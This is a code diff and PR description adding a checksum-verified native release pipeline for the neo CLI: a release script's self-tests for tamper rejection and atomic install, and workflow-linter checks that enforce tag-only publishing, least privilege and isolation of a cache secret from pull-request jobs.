+  printf 'fake neo binary\n' > "$tmp/built"
+  cmd_package "$t" "$tmp/built" "$tmp/out" >/dev/null
+  [ -f "$tmp/out/$(asset_name "$t")" ] && ok "package copies to neo-<target>" \
+    || bad "package did not produce the asset"
+  cmd_checksums "$tmp/out" >/dev/null
+  grep -q "  neo-$t\$" "$tmp/out/$SHA256SUMS" && ok "checksums lists the asset" \
+    || bad "checksums missing the asset line"
+  # Failure-expecting calls run in a subshell: `die` exits, and a subshell keeps
+  # that exit from tearing down the whole self-test.
+  if ( cmd_verify "$tmp/out" "$t" ) >/dev/null 2>&1; then ok "verify accepts a good asset"
+  else bad "verify rejected a good asset"; fi
+  printf 'TAMPERED\n' > "$tmp/out/$(asset_name "$t")"
+  if ( cmd_verify "$tmp/out" "$t" ) >/dev/null 2>&1; then bad "verify accepted a tampered asset"
+  else ok "verify rejects a tampered asset"; fi
+
+  # 5. install verifies then places atomically (restore a good asset first).
+  printf 'fake neo binary\n' > "$tmp/out/$(asset_name "$t")"
+  cmd_install "$tmp/out" "$t" "$tmp/dest/neo" >/dev/null
+  [ -x "$tmp/dest/neo" ] && ok "install places an executable atomically" \
+    || bad "install did not produce an executable"
+
+  # 6. install refuses a tampered asset (never writes dest).
+  printf 'TAMPERED\n' > "$tmp/out/$(asset_name "$t")"
+  rm -f "$tmp/dest2/neo" 2>/dev/null || true
+  if ( cmd_install "$tmp/out" "$t" "$tmp/dest2/neo" ) >/dev/null 2>&1; then
+    bad "install placed a tampered asset"
+  else
+    [ ! -e "$tmp/dest2/neo" ] && ok "install refuses a tampered asset (dest untouched)" \
+      || bad "install left a tampered asset behind"
+  fi
+
+  # 7. TOCTOU regression: install must verify the EXACT bytes it places, so the
+  #    installed file's hash equals the manifest entry (no re-read of the source
+  #    between verify and install). Restore a good asset + refresh the manifest.
+  printf 'the real neo\n' > "$tmp/out/$(asset_name "$t")"
+  cmd_checksums "$tmp/out" >/dev/null
+  cmd_install "$tmp/out" "$t" "$tmp/dest3/neo" >/dev/null
+  installed_hash="$(sha256_of "$tmp/dest3/neo")"
+  manifest_hash="$(manifest_expected "$tmp/out/$SHA256SUMS" "$(asset_name "$t")")"
+  [ -n "$installed_hash" ] && [ "$installed_hash" = "$manifest_hash" ] \
+    && ok "install verifies the exact bytes it places (TOCTOU-closed)" \
+    || bad "installed file hash != manifest (TOCTOU window / wrong bytes installed)"
+
+  # 8. portability gate decision seam: a /nix/store reference is flagged; clean
+  #    inspector output is not.
+  [ -n "$(printf '/nix/store/abc/lib.so\n/usr/lib/x\n' | filter_nix_store)" ] \
+    && ok "portability: /nix/store reference is flagged" \
+    || bad "portability: /nix/store reference was not flagged"
+  [ -z "$(printf '/usr/lib/libSystem.B.dylib\n/lib64/ld.so\n' | filter_nix_store)" ] \
+    && ok "portability: clean binary passes" \
+    || bad "portability: clean binary wrongly flagged"
+
+  rm -rf "$tmp"
+  if [ "$fails" -ne 0 ]; then
+    printf 'neo-release self-test: FAILED (%d)\n' "$fails" >&2
+    return 1
+  fi
+  printf 'neo-release self-test: OK — naming, checksums, verify, atomic install, TOCTOU, portability\n'
+}
+
+main() {
+  local sub="${1:-}"
+  [ $# -gt 0 ] && shift || true
+  case "$sub" in
+    targets)     cmd_targets "$@" ;;
+    asset-name)  cmd_asset_name "$@" ;;
+    package)     cmd_package "$@" ;;
+    checksums)   cmd_checksums "$@" ;;
+    verify)      cmd_verify "$@" ;;
+    install)     cmd_install "$@" ;;
+    inspect)     cmd_inspect "$@" ;;
+    --self-test) self_test ;;
+    -h|--help|"") sed -n '2,40p' "$0" | sed 's/^# \{0,1\}//' ;;
+    *) die "unknown subcommand '$sub' (see --help)" ;;
+  esac
+}
+
+main "$@"

--- a/scripts/workflow-check
+++ b/scripts/workflow-check
@@ -529,6 +529,249 @@ def check_consumer_contract(name, text):
     return errs
 
 
+# ── neo-release.yml: Neo CLI native-release publication contract ──────────────
+# (PR 6) The release workflow builds native `neo` binaries for every installer
+# target and publishes them ONLY from a `neo-v*` tag, after the build/test gates.
+# These invariants are load-bearing and unreviewable-by-eye, so freeze them:
+#   (a) trigger is tag-only for publication — a `neo-v*` push tag, and NO
+#       auto-publishing trigger (no pull_request / pull_request_target, no
+#       push-to-branch). A maintainer workflow_dispatch may REHEARSE only.
+#   (b) publication is fail-closed: the publish job is gated on the `neo-v*` tag
+#       ref, so any non-tag run builds/rehearses but never publishes.
+#   (c) least privilege: only the publish job holds `contents: write`; the build
+#       matrix stays read-only.
+#   (d) the build matrix covers EVERY installer target, so no platform is silently
+#       dropped from a release.
+#   (e) asset naming + checksums go through the shared `scripts/neo-release`
+#       contract, so published names can't drift from what the installer downloads.
+NEO_RELEASE_GATE = "neo-release.yml"
+NEO_RELEASE_TARGETS = (
+    "x86_64-unknown-linux-gnu",
+    "aarch64-unknown-linux-gnu",
+    "x86_64-apple-darwin",
+    "aarch64-apple-darwin",
+)
+NEO_RELEASE_TAG_PREFIX = "neo-v"
+NEO_RELEASE_SCRIPT = "scripts/neo-release"
+
+
+def check_neo_release(name, text):
+    errs = []
+    E = errs.append
+    code = strip_comments(text)
+    on = _on_block(code)
+    triggers = _on_trigger_keys(on)
+    jobs = job_blocks(code)
+
+    # (a) tag-only publication trigger.
+    if "push" not in triggers:
+        E(f"{name}: no `push:` trigger — a Neo release must fire on a "
+          f"'{NEO_RELEASE_TAG_PREFIX}*' tag push")
+    else:
+        # the push trigger must be tag-scoped to neo-v* (not a branch push).
+        if "tags:" not in on or NEO_RELEASE_TAG_PREFIX not in on:
+            E(f"{name}: push trigger is not scoped to '{NEO_RELEASE_TAG_PREFIX}*' tags")
+        if re.search(r"push:\s*\n(?:\s+[^\n]*\n)*?\s+branches:", on):
+            E(f"{name}: push trigger includes `branches:` — a release must publish "
+              "off a tag, never a branch push")
+    for banned in ("pull_request", "pull_request_target"):
+        if banned in triggers:
+            E(f"{name}: `on:` has a '{banned}' trigger — the release workflow must "
+              "never build-to-publish from a PR (PR rehearsal lives in neo-ci.yml)")
+
+    # (b) fail-closed publish gate on the neo-v* tag ref.
+    publish = jobs.get("publish", "")
+    if not publish:
+        E(f"{name}: missing the `publish` job")
+    else:
+        if not re.search(
+            r"if:\s*startsWith\(github\.ref,\s*'refs/tags/" + re.escape(NEO_RELEASE_TAG_PREFIX),
+            publish,
+        ):
+            E(f"{name}: publish job is not gated on a '{NEO_RELEASE_TAG_PREFIX}*' tag ref "
+              "(`if: startsWith(github.ref, 'refs/tags/neo-v')`) — publication must be "
+              "fail-closed to tags")
+        if "contents: write" not in publish:
+            E(f"{name}: publish job lacks `contents: write` (cannot upload the release)")
+
+    # (c) least privilege: build matrix must not elevate to contents: write.
+    build = jobs.get("build", "")
+    if build and "contents: write" in build:
+        E(f"{name}: build job holds `contents: write` — only the tag-gated publish "
+          "job may write (least privilege)")
+
+    # (d) every installer target is built.
+    for target in NEO_RELEASE_TARGETS:
+        if target not in code:
+            E(f"{name}: build matrix is missing target '{target}' — the release would "
+              "drop a platform the installer supports")
+
+    # (e) naming/checksums via the shared contract.
+    if NEO_RELEASE_SCRIPT not in code:
+        E(f"{name}: does not package/checksum via `{NEO_RELEASE_SCRIPT}` — asset names "
+          "would drift from what the installer downloads")
+
+    # (f) PORTABLE, tested artifacts. The release binary must be a portable cargo
+    #     build (a `nix build .#neo` output hard-codes /nix/store libs and is not
+    #     runnable off Nix), it must pass the portability gate, and each target
+    #     must be natively install+smoked before publication.
+    if "cargo build" not in build:
+        E(f"{name}: build job does not produce a portable binary via `cargo build` "
+          "(a nix-built binary references /nix/store and is not portable)")
+    if "nix build" in build:
+        E(f"{name}: build job produces the release artifact via `nix build` — that "
+          "binary hard-codes /nix/store paths and is NOT portable; use a pinned cargo build")
+    if f"{NEO_RELEASE_SCRIPT} inspect" not in build:
+        E(f"{name}: build job does not run the portability gate "
+          f"(`{NEO_RELEASE_SCRIPT} inspect`) before packaging")
+    if f"{NEO_RELEASE_SCRIPT} install" not in build:
+        E(f"{name}: build job does not natively install the packaged asset "
+          f"(`{NEO_RELEASE_SCRIPT} install`) before publication")
+    if "--version" not in build:
+        E(f"{name}: build job does not natively smoke the installed asset "
+          "(`neo --version`) before publication")
+    return errs
+
+
+# ── neo-ci.yml: release-rehearsal, secret isolation + Cachix trust boundary ───
+# (PR 6 / adversarial-review hardening) Two jobs, one invariant set:
+#   consumer-contract — the PR-reachable release rehearsal. Builds the PORTABLE
+#     binary (pinned cargo, not nix), runs the portability gate, checksum-verifies
+#     + installs it, and drives the exact consumer path via NEO_BIN. Because it
+#     checks out and runs PR-controlled code it must hold NO Cachix secret at all.
+#   cache-populate — an ISOLATED, main-only job that alone holds CACHIX_AUTH_TOKEN,
+#     runs the exact consumer path, pushes to Cachix, and skips honestly when no
+#     token is configured (never fails, never pretends to push).
+CACHE_POPULATE_JOB = "cache-populate"
+
+
+def _steps_of(job_text):
+    """Each step block in a job (split on `      - ` step markers)."""
+    steps, cur = [], None
+    for ln in job_text.splitlines():
+        if re.match(r"^      - ", ln):
+            if cur is not None:
+                steps.append("\n".join(cur))
+            cur = [ln]
+        elif cur is not None:
+            cur.append(ln)
+    if cur is not None:
+        steps.append("\n".join(cur))
+    return steps
+
+
+def check_release_rehearsal(name, text):
+    errs = []
+    E = errs.append
+    # Executable content only.
+    jobs = job_blocks(strip_comments(text))
+    job = jobs.get(CONSUMER_CONTRACT_JOB, "")
+    if not job:
+        # check_consumer_contract already reports the missing job.
+        return errs
+
+    # Release rehearsal wiring: build portable (gated), install, feed via NEO_BIN.
+    if NEO_RELEASE_SCRIPT not in job:
+        E(f"{name}: `{CONSUMER_CONTRACT_JOB}` no longer packages the release artifact "
+          f"via `{NEO_RELEASE_SCRIPT}` — the release path is not rehearsed")
+    if "NEO_BIN=" not in job:
+        E(f"{name}: `{CONSUMER_CONTRACT_JOB}` does not drive the contract through the "
+          "installed release artifact (NEO_BIN=...) — it must rehearse the real binary")
+    if f"{NEO_RELEASE_SCRIPT} install" not in job:
+        E(f"{name}: `{CONSUMER_CONTRACT_JOB}` does not checksum-verify + install the "
+          f"artifact (`{NEO_RELEASE_SCRIPT} install`) before running the contract")
+    if f"{NEO_RELEASE_SCRIPT} inspect" not in job:
+        E(f"{name}: `{CONSUMER_CONTRACT_JOB}` does not run the portability gate "
+          f"(`{NEO_RELEASE_SCRIPT} inspect`) — it could rehearse a non-portable binary")
+
+    # SECRET ISOLATION: the PR-reachable rehearsal must hold NO Cachix secret.
+    if "CACHIX_AUTH_TOKEN" in job or "cachix" in job.lower():
+        E(f"{name}: `{CONSUMER_CONTRACT_JOB}` references Cachix/CACHIX_AUTH_TOKEN — this "
+          "job checks out and runs PR-controlled code and must hold NO cache secret. "
+          f"Move cache population to the isolated `{CACHE_POPULATE_JOB}` job.")
+    return errs
+
+
+def check_cache_populate(name, text):
+    """The isolated, main-only cache-population job (adversarial-review fix): it
+    alone holds the token, is unreachable by PR code, runs the exact consumer
+    path, and skips honestly when no token is set."""
+    errs = []
+    E = errs.append
+    jobs = job_blocks(strip_comments(text))
+    job = jobs.get(CACHE_POPULATE_JOB, "")
+    if not job:
+        E(f"{name}: missing the isolated `{CACHE_POPULATE_JOB}` job — trusted cache "
+          "population must not live in a PR-reachable job")
+        return errs
+
+    # main-only trust guard (push to refs/heads/main), never a pull_request.
+    guard = re.search(r"if:\s*>-?\s*\n((?:\s+[^\n]*\n)+)", job)
+    guard_text = guard.group(1) if guard else job
+    if "refs/heads/main" not in guard_text:
+        E(f"{name}: `{CACHE_POPULATE_JOB}` is not gated to `github.ref == 'refs/heads/main'` "
+          "— the token must only ever run on trusted main pushes")
+    if "pull_request" in guard_text:
+        E(f"{name}: `{CACHE_POPULATE_JOB}` gate references pull_request — it must be "
+          "main-push-only, never reachable from a PR")
+    # It holds the token and runs the exact consumer path.
+    if "CACHIX_AUTH_TOKEN" not in job:
+        E(f"{name}: `{CACHE_POPULATE_JOB}` does not use CACHIX_AUTH_TOKEN (it is the one "
+          "job that should)")
+    if "cachix/cachix-action" not in job:
+        E(f"{name}: `{CACHE_POPULATE_JOB}` has no cachix-action push step")
+    if CONTRACT_VERB not in job:
+        E(f"{name}: `{CACHE_POPULATE_JOB}` does not run the exact consumer path "
+          f"(`./dev {CONTRACT_VERB}`) — the cache must be populated from real execution")
+    # Honest skip: a step gated on an EMPTY token (skip, don't fail/pretend).
+    if "CACHIX_AUTH_TOKEN == ''" not in job:
+        E(f"{name}: `{CACHE_POPULATE_JOB}` has no honest-skip path for a missing token "
+          "(`env.CACHIX_AUTH_TOKEN == ''`) — a missing token must skip, not fail")
+    # Every Cachix/token-bearing work step must be guarded on token presence.
+    for step in _steps_of(job):
+        if "cachix/cachix-action" in step or CONTRACT_VERB in step:
+            cond = (re.search(r"if:\s*(.+)", step) or [None, ""])[1]
+            if "CACHIX_AUTH_TOKEN != ''" not in cond:
+                E(f"{name}: a `{CACHE_POPULATE_JOB}` work step is not gated on token "
+                  "presence (`env.CACHIX_AUTH_TOKEN != ''`) — it would run/push with no token")
+    return errs
+
+
+# ── installer-ci.yml: installer component gate on stacked PRs ──────────────────
+# (PR 6) Like the neo component gate, the installer gate must run on ARBITRARY PR
+# bases (no base-branch allowlist, so a stacked layer on any branch stays gated),
+# and its required check must be an always()-running aggregate that evaluates the
+# component jobs — so a diff-skipped component job never leaves a required check
+# pending in branch protection.
+INSTALLER_GATE = "installer-ci.yml"
+INSTALLER_GATE_JOB = "installer-ci-gate"
+
+
+def check_installer_ci(name, text):
+    errs = []
+    E = errs.append
+    prb = pull_request_branches(text)
+    if prb is not None:
+        E(f"{name}: pull_request has a `branches:` allowlist ({', '.join(prb)}) — the "
+          "installer gate must run on EVERY stacked-PR base, not only named branches. "
+          "Drop the filter and diff-scope in the `changes` job.")
+    gate = job_blocks(text).get(INSTALLER_GATE_JOB, "")
+    if not gate:
+        E(f"{name}: missing the `{INSTALLER_GATE_JOB}` aggregate gate (the branch-"
+          "protection-safe required check)")
+        return errs
+    if not re.search(r"if:\s*always\(\)", gate):
+        E(f"{name}: `{INSTALLER_GATE_JOB}` is not `if: always()` — a diff-skipped "
+          "component job would leave the required check pending forever")
+    if not re.search(r"^    needs:.*\bbuild\b", gate, re.M):
+        E(f"{name}: `{INSTALLER_GATE_JOB}` does not `needs:` the component jobs "
+          "(build/lint/test) — it would not aggregate their results")
+    if ".result }}" not in gate and ".result" not in gate:
+        E(f"{name}: `{INSTALLER_GATE_JOB}` never evaluates a component job `.result` — "
+          "a failure/skip would pass unnoticed")
+    return errs
+
+
 def run(root=WORKFLOWS):
     errs = []
     for wf in sorted(root.glob("*.yml")):
@@ -543,6 +786,12 @@ def run(root=WORKFLOWS):
         if wf.name == COMPONENT_GATE:
             errs += check_component_gate(wf.name, text)
             errs += check_consumer_contract(wf.name, text)
+            errs += check_release_rehearsal(wf.name, text)
+            errs += check_cache_populate(wf.name, text)
+        if wf.name == NEO_RELEASE_GATE:
+            errs += check_neo_release(wf.name, text)
+        if wf.name == INSTALLER_GATE:
+            errs += check_installer_ci(wf.name, text)
     retro = root / "retrospect.yml"
     if not retro.exists():
         errs.append("retrospect.yml is missing (deterministic learning-loop digest)")
@@ -554,6 +803,10 @@ def run(root=WORKFLOWS):
     component = root / COMPONENT_GATE
     if not component.exists():
         errs.append(f"{COMPONENT_GATE} is missing (the Neo CLI component gate)")
+    if not (root / NEO_RELEASE_GATE).exists():
+        errs.append(f"{NEO_RELEASE_GATE} is missing (the Neo CLI native-release publication workflow)")
+    if not (root / INSTALLER_GATE).exists():
+        errs.append(f"{INSTALLER_GATE} is missing (the installer component gate)")
     return errs
 
 
@@ -858,6 +1111,190 @@ def self_test():
            good_contract.replace(
                "          CONTRACT='^(neo/|core/|integrations/|nix/neo-package\\.nix|scripts/neo-consumer-contract)'\n",
                ""))
+
+    # ── neo-release.yml native-release publication contract (PR 6) ────────────
+    good_release = (
+        "name: Neo Release\n"
+        "on:\n"
+        "  push:\n"
+        "    tags: [\"neo-v*\"]\n"
+        "  workflow_dispatch: {}\n"
+        "permissions:\n"
+        "  contents: read\n"
+        "jobs:\n"
+        "  build:\n"
+        "    strategy:\n      matrix:\n        include:\n"
+        "          - target: x86_64-unknown-linux-gnu\n"
+        "          - target: aarch64-unknown-linux-gnu\n"
+        "          - target: x86_64-apple-darwin\n"
+        "          - target: aarch64-apple-darwin\n"
+        "    steps:\n"
+        "      - run: cargo build --release --locked --manifest-path neo/Cargo.toml --target \"$TARGET\"\n"
+        "      - run: ./scripts/neo-release inspect \"neo/target/$TARGET/release/neo\" \"$TARGET\"\n"
+        "      - run: ./scripts/neo-release package \"$TARGET\" \"neo/target/$TARGET/release/neo\" artifacts\n"
+        "      - run: ./scripts/neo-release install artifacts \"$TARGET\" \"$RUNNER_TEMP/neo-smoke/neo\"\n"
+        "      - run: \"$RUNNER_TEMP/neo-smoke/neo\" --version\n"
+        "  publish:\n"
+        "    needs: [build]\n"
+        "    if: startsWith(github.ref, 'refs/tags/neo-v')\n"
+        "    permissions:\n      contents: write\n"
+        "    steps:\n"
+        "      - run: ./scripts/neo-release checksums artifacts\n"
+    )
+
+    def nr_bad(name_, mutated):
+        check(name_, bool(check_neo_release("neo-release.yml", mutated)))
+
+    check("well-formed neo-release passes",
+          not check_neo_release("neo-release.yml", good_release))
+    nr_bad("a pull_request trigger is flagged (no build-to-publish on PRs)",
+           good_release.replace("  workflow_dispatch: {}\n",
+                                "  workflow_dispatch: {}\n  pull_request:\n    types: [opened]\n"))
+    nr_bad("a branch push trigger is flagged",
+           good_release.replace("    tags: [\"neo-v*\"]\n",
+                                "    branches: [main]\n    tags: [\"neo-v*\"]\n"))
+    nr_bad("publish not gated on the neo-v tag ref is flagged",
+           good_release.replace("    if: startsWith(github.ref, 'refs/tags/neo-v')\n", ""))
+    nr_bad("build job holding contents: write is flagged (least privilege)",
+           good_release.replace("  build:\n    strategy:\n",
+                                "  build:\n    permissions:\n      contents: write\n    strategy:\n"))
+    nr_bad("publish lacking contents: write is flagged",
+           good_release.replace("    permissions:\n      contents: write\n", ""))
+    nr_bad("a dropped release target is flagged",
+           good_release.replace("          - target: aarch64-unknown-linux-gnu\n", ""))
+    nr_bad("packaging without scripts/neo-release is flagged (asset-name drift)",
+           good_release.replace("scripts/neo-release", "cp-inline-naming"))
+    nr_bad("building the release artifact via nix build is flagged (non-portable)",
+           good_release.replace(
+               "      - run: cargo build --release --locked --manifest-path neo/Cargo.toml --target \"$TARGET\"\n",
+               "      - run: nix build .#neo\n"))
+    nr_bad("missing the portability gate is flagged",
+           good_release.replace(
+               "      - run: ./scripts/neo-release inspect \"neo/target/$TARGET/release/neo\" \"$TARGET\"\n", ""))
+    nr_bad("missing native install+smoke is flagged",
+           good_release.replace(
+               "      - run: ./scripts/neo-release install artifacts \"$TARGET\" \"$RUNNER_TEMP/neo-smoke/neo\"\n"
+               "      - run: \"$RUNNER_TEMP/neo-smoke/neo\" --version\n", ""))
+
+    # ── neo-ci.yml: release rehearsal + SECRET ISOLATION + cache-populate (PR 6) ─
+    good_rehearsal = (
+        "jobs:\n"
+        "  consumer-contract:\n"
+        "    steps:\n"
+        "      - uses: actions/checkout@v7.0.0\n"
+        "      - name: build+install\n"
+        "        run: |\n"
+        "          cargo build --release --locked --manifest-path neo/Cargo.toml --target x\n"
+        "          ./scripts/neo-release inspect neo/target/x/release/neo x\n"
+        "          ./scripts/neo-release package x neo/target/x/release/neo o\n"
+        "          ./scripts/neo-release install o x $RUNNER_TEMP/neo-bin/neo\n"
+        "          echo NEO_BIN=$RUNNER_TEMP/neo-bin/neo >> $GITHUB_ENV\n"
+        "      - run: ./dev neo-consumer-contract\n"
+    )
+
+    def rh_bad(name_, mutated):
+        check(name_, bool(check_release_rehearsal("neo-ci.yml", mutated)))
+
+    check("well-wired release rehearsal (no secret) passes",
+          not check_release_rehearsal("neo-ci.yml", good_rehearsal))
+    rh_bad("a Cachix secret in the PR-reachable rehearsal is flagged (isolation)",
+           good_rehearsal.replace(
+               "  consumer-contract:\n    steps:\n",
+               "  consumer-contract:\n    env:\n      CACHIX_AUTH_TOKEN: x\n    steps:\n"))
+    rh_bad("a cachix-action in the PR-reachable rehearsal is flagged (isolation)",
+           good_rehearsal.replace(
+               "      - uses: actions/checkout@v7.0.0\n",
+               "      - uses: actions/checkout@v7.0.0\n      - uses: cachix/cachix-action@v17\n"))
+    rh_bad("missing the portability gate in the rehearsal is flagged",
+           good_rehearsal.replace(
+               "          ./scripts/neo-release inspect neo/target/x/release/neo x\n", ""))
+    rh_bad("not driving the contract via the installed artifact (NEO_BIN) is flagged",
+           good_rehearsal.replace("          echo NEO_BIN=$RUNNER_TEMP/neo-bin/neo >> $GITHUB_ENV\n", ""))
+    rh_bad("not verify-installing the artifact is flagged",
+           good_rehearsal.replace(
+               "          ./scripts/neo-release install o x $RUNNER_TEMP/neo-bin/neo\n", ""))
+
+    # cache-populate: isolated, main-only, token-holding, honest-skip.
+    good_cache = (
+        "jobs:\n"
+        "  cache-populate:\n"
+        "    if: >-\n"
+        "      github.event_name == 'push'\n"
+        "      && github.ref == 'refs/heads/main'\n"
+        "      && github.repository == 'neohaskell/NeoHaskell'\n"
+        "    env:\n      CACHIX_AUTH_TOKEN: ${{ secrets.CACHIX_AUTH_TOKEN }}\n"
+        "    steps:\n"
+        "      - name: skip\n        if: ${{ env.CACHIX_AUTH_TOKEN == '' }}\n        run: echo skip\n"
+        "      - uses: cachix/cachix-action@v17\n        if: ${{ env.CACHIX_AUTH_TOKEN != '' }}\n"
+        "      - name: populate\n        if: ${{ env.CACHIX_AUTH_TOKEN != '' }}\n"
+        "        run: NEO_BIN=x ./dev neo-consumer-contract\n"
+    )
+
+    def cp_bad(name_, mutated):
+        check(name_, bool(check_cache_populate("neo-ci.yml", mutated)))
+
+    check("well-wired cache-populate passes",
+          not check_cache_populate("neo-ci.yml", good_cache))
+    cp_bad("missing cache-populate job is flagged",
+           good_cache.replace("  cache-populate:\n", "  other:\n"))
+    cp_bad("cache-populate not gated to main is flagged",
+           good_cache.replace("      && github.ref == 'refs/heads/main'\n", ""))
+    cp_bad("cache-populate reachable from a PR is flagged",
+           good_cache.replace("      github.event_name == 'push'\n",
+                              "      github.event_name == 'pull_request'\n"))
+    cp_bad("cache-populate without an honest-skip path is flagged",
+           good_cache.replace(
+               "      - name: skip\n        if: ${{ env.CACHIX_AUTH_TOKEN == '' }}\n        run: echo skip\n", ""))
+    cp_bad("cache-populate not running the consumer path is flagged",
+           good_cache.replace("        run: NEO_BIN=x ./dev neo-consumer-contract\n",
+                              "        run: echo nothing\n"))
+    cp_bad("an unguarded cachix push step is flagged",
+           good_cache.replace(
+               "      - uses: cachix/cachix-action@v17\n        if: ${{ env.CACHIX_AUTH_TOKEN != '' }}\n",
+               "      - uses: cachix/cachix-action@v17\n"))
+
+    # ── installer-ci.yml arbitrary-base + aggregate gate (PR 6) ───────────────
+    good_installer = (
+        "on:\n  push:\n    branches: [main]\n    tags: [\"installer-v*\"]\n"
+        "  pull_request:\n    types: [opened, synchronize]\n"
+        "jobs:\n"
+        "  changes:\n    steps:\n      - run: echo hi\n"
+        "  lint:\n    steps:\n      - run: echo hi\n"
+        "  test:\n    steps:\n      - run: echo hi\n"
+        "  build:\n    steps:\n      - run: echo hi\n"
+        "  installer-ci-gate:\n"
+        "    if: always()\n"
+        "    needs: [changes, lint, test, build]\n"
+        "    steps:\n"
+        "      - run: echo ${{ needs.build.result }}\n"
+    )
+
+    def ic_bad(name_, mutated):
+        check(name_, bool(check_installer_ci("installer-ci.yml", mutated)))
+
+    check("well-wired installer gate passes",
+          not check_installer_ci("installer-ci.yml", good_installer))
+    check("installer gate runs on arbitrary bases (no branches allowlist)",
+          pull_request_branches(good_installer) is None)
+    ic_bad("installer gate with a base allowlist is flagged (breaks stacked layers)",
+           good_installer.replace(
+               "  pull_request:\n    types: [opened, synchronize]\n",
+               "  pull_request:\n    branches: [main]\n    types: [opened, synchronize]\n"))
+    ic_bad("missing installer-ci-gate is flagged",
+           good_installer.replace(
+               "  installer-ci-gate:\n"
+               "    if: always()\n"
+               "    needs: [changes, lint, test, build]\n"
+               "    steps:\n"
+               "      - run: echo ${{ needs.build.result }}\n", ""))
+    ic_bad("installer gate not always() is flagged",
+           good_installer.replace("    if: always()\n", ""))
+    ic_bad("installer gate not needing build is flagged",
+           good_installer.replace("    needs: [changes, lint, test, build]\n",
+                                  "    needs: [changes]\n"))
+    ic_bad("installer gate not evaluating a component result is flagged",
+           good_installer.replace("      - run: echo ${{ needs.build.result }}\n",
+                                  "      - run: echo done\n"))
 
     print("workflow-check: self-test", "OK" if ok else "FAILED")
     return 0 if ok else 1


### PR DESCRIPTION
## Summary

- adds an independent, tag-only `neo-v*` release train with checksummed native binaries for supported Linux and macOS targets
- restores independent `installer-v*` CI/releases with a fail-closed stacked-PR gate
- changes `neo-install` to resolve, download, checksum-verify, and atomically install native `neo` assets instead of evaluating the retired standalone flake
- rehearses the installed native artifact through the generated-project consumer contract
- isolates Cachix writes to trusted same-repository pushes to `main`; PR jobs never receive the token
- preserves `nix build .#neo`, `nix run .#neo`, and the root overlay for declarative users

## Security and reproducibility

- release publication is impossible from PRs or branch pushes; publish jobs require the matching tag prefix and successful build matrix
- installer pins accept only validated `neo-v*` tags and GitHub release JSON is parsed structurally
- downloaded bytes are checked against the release `SHA256SUMS` before same-filesystem atomic replacement
- shell profile paths are validated and shell-quoted
- the shell rehearsal verifies and installs the same private temporary file, closing the checksum TOCTOU window
- release artifacts are built with a pinned Rust toolchain rather than copied from Nix outputs; a blocking portability gate rejects `/nix/store` references
- all supported matrix artifacts receive native install and smoke checks before publication

## Verification

- `nix develop ./neo -c cargo test --manifest-path installer/Cargo.toml --locked --all-features 'release::tests'`
- `nix develop ./neo -c cargo test --manifest-path installer/Cargo.toml --locked --test consistency`
- `nix develop ./neo -c cargo clippy --manifest-path installer/Cargo.toml --locked --all-targets --all-features -- -D warnings`
- `./scripts/neo-release --self-test`
- `./dev workflow-check`
- `./dev workflow-check --self-test`
- `./dev neo-consumer-contract --self-test`
- `./dev doctor`
- `git diff --check`

No release, tag, Cachix write, repository setting, or secret was created or changed.

## Residual release gates

- GitHub-hosted cross-platform runners and all target-native artifacts remain to be proven by hosted CI/rehearsal.
- Clean-machine onboarding and the 600-second SLO remain explicitly scoped to the cutover layer, not claimed here.
- Third-party Actions retain the repository's existing version-tag pinning convention; immutable action-SHA migration is not bundled into this layer.

Stacked on #774.